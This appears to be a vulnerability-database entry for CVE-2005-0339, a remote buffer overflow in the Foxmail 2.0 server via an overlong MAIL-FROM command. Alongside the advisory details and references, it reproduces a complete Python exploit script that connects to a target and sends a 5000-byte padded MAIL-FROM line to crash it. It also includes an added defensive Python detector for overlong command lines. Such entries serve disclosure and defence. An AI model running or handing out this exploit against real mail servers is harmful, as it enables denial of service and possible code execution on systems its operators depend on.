Foxmail MAIL-FROM Remote Buffer Overflow Vulnerability

Vulnerability ID: 1108437
Vulnerability type: Buffer overflow
Published: 2005-02-07
Updated: 2005-10-20
CVE ID: CVE-2005-0339
CNNVD-ID: CNNVD-200505-165
Platform: Windows
CVSS score: 10.0
|Vulnerability source
https://www.exploit-db.com/exploits/797
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-165
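|Vulnerability details
A buffer overflow in Foxmail 2.0 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a long MAIL-FROM command.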
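
A defender-side check for the condition described above, added here as an example and not taken from the original entry or its sources: it scans a reassembled client-to-server byte stream and reports command lines longer than 512 octets. The 512-octet value is the RFC 5321 command-line limit; applying it to this server's MAIL-FROM dialect, and the names `find_overlong_lines`, `_verb` and `SAMPLE`, are assumptions.

```python
# Added example: flag overlong command lines in a client->server byte stream.
MAX_LINE = 512  # RFC 5321 command-line limit incl. CRLF; assumed to fit this dialect


def find_overlong_lines(chunks, max_line=MAX_LINE):
    """Return a list of (verb, length, terminated) for lines longer than max_line.

    chunks: iterable of bytes as delivered by TCP reassembly (any split points).
    Only the first 32 bytes of the current line are retained, so an unterminated
    multi-megabyte line cannot exhaust the detector's memory.
    """
    findings = []
    head = bytearray()   # first bytes of the current line, used for the verb
    length = 0           # bytes seen in the current line, including CRLF
    for chunk in chunks:
        for byte in chunk:
            length += 1
            if len(head) < 32:
                head.append(byte)
            if byte == 0x0A:  # LF ends the line (bare LF tolerated on purpose)
                if length > max_line:
                    findings.append((_verb(head), length, True))
                head, length = bytearray(), 0
    if length > max_line:  # stream ended in the middle of an oversized line
        findings.append((_verb(head), length, False))
    return findings


def _verb(head):
    # Command word = text before the first ':' or space, e.g. b"MAIL-FROM".
    text = bytes(head).strip()
    for sep in (b":", b" "):
        text = text.split(sep, 1)[0]
    return text.decode("ascii", "replace").upper()


# Constructed sample session, split at arbitrary points like real TCP segments.
SAMPLE = [
    b"HELO localhost\r\nMAIL-FR",
    b"OM: <" + b"x" * 600,
    b">\r\nRCPT-TO: <user@example.test>\r\n",
    b"QUIT\r\n",
]

if __name__ == "__main__":
    for verb, length, terminated in find_overlong_lines(SAMPLE):
        print("overlong %s line: %d bytes, terminated=%s" % (verb, length, terminated))
```

The `terminated` field separates a completed oversized line from a stream that ended, or is still open, partway through one.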
|Exploit
#!/usr/bin/python
#Code by OYXin
#oyxin_at_segfault.cn
import socket
import sys
import getopt


def usage():
    print "Usage: foxserver.py -h host -p port"
    sys.exit(0)
    
if __name__ == '__main__':
    
    try: 
        opts, args = getopt.getopt(sys.argv[1:], "h:p:") 
    except getopt.GetoptError, msg: 
        print msg
        usage()
        
    for o,a in opts:
        if o in ["-h"]:
            host = a
        if o in ["-p"]:
            port = int(a)

    evilbuf =  "MAIL-FROM: <" + "A"*5000 + ">" + "\r\n"
    evilbuf += "RCPT-TO: [email protected]" + "\r\n"
    evilbuf += "Message-ID: 123" + "\r\n"
    evilbuf += "ASDF" + "\r\n"
    evilbuf += "." + "\r\n"
    evilbuf += "QUIT" + "\r\n"
    try:
        sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sockfd.connect((host, port))
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send("HELO localhost\r\n")
        recvbuf = sockfd.recv(1024)
        print `recvbuf`
        sockfd.send(evilbuf)
    except socket.error, msg:
        print msg
        
    sockfd.close()

# milw0rm.com [2005-02-07]
|References

Source: XF
Name: foxmail-mailfrom-bo(19229)
Link: http://xforce.iss.net/xforce/xfdb/19229
Source: BID
Name: 12454
Link: http://www.securityfocus.com/bid/12454
Source: BUGTRAQ
Name: 20050205 Foxmail Server Remote Buffer Overflow Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=110763204301080&w=2
